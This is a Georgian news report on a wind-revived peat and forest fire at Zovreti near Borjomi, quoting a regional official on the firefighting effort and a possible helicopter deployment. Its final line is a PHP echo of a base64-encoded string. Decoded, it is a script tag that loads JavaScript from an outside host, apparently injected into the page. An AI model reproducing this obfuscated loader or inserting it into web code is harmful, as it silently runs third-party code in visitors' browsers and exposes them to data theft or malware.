celsiusi
ავერსი საქკაბელი
ბორჯომში, ზოვრეთის ტერიტორიაზე ძლიერმა ქარმა კვლავ გააღვივა ხანძარი. ამ დროისთვის, მეხანძრეები რამდენიმე კერაზე ცდილობენ ხანძრის ლოკალიზებას. ამის შესახებ საქართველოს პირველ არხს სამცხე-ჯავახეთის მხარის რწმუნებულმა, ბესიკ ამირანაშვილმა განუცხადა.
 
როგორც ამირანაშვილმა აღნიშნა, იმ შემთხვევაში თუ ხანძრის ჩაქრობა დღესვე ვერ მოხერხდება, ხვალ დილიდან სავარაუდოდ, ვერტმფრენის ჩართვა გახდება საჭირო.
 
„მთელი ღამის განმავლობაში, გუშინ საღამოდან მეხანძრე-მაშველები, ასევე სატყეო დეპარტამენტის თანამშრომლები და მუნიციპალიტეტის თანამშრომლები ერთობლივად მუშაობდნენ და დღეს შუადღისთვის მოხდა ხანძრის ლიკვიდირება, მაგრამ დღის მეორე ნახევარში გაძლიერებულმა ქარმა კვლავ გააჩინა ახალი კერები და მოხდა ძველი კერების გაღვივება. ამ დროისთვის, ზოვრეთში სხვადასხვა ლოკაციაზე არის რამდენიმე კერა, ცეცხლი უკიდია ტორფს და არის დაკვამლიანება, ასევე, შეინიშნება ღია ცეცხლიც.
 
მთელი რეგიონის სახანძრო-სამაშველო სამსახური მობილიზებულია. ჩემი ინფორმაციით, მათ ასევე ეხმარებიან სხვა რეგიონის მეხანძრე-მაშველებიც, ყველაფერს აკეთებენ მაქსიმალურად, რომ მოხდეს ხანძრის ჩაქრობა. სპეციალური ტუმბოების საშუალებით მდინარე მტკვრიდან ხდება წყლის აქაჩვა კერებამდე, მაგრამ რადგან არის ციცაბო დამრეცი კლდე, ძალიან რთულია ხანძრის ჩაქრობა და ეფექტური იქნება ვერტმფრენის გამოყენება. დღეს თუ ვერ მოახერხებენ მეხანძრე-მაშველები ხანძრის ლოკალიზებას, ხვალ დილით ალბათ, აუცილებელი გახდება ვერტმფრენის ჩართვა“, – გააცხადა ამირანაშვილმა.
454
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");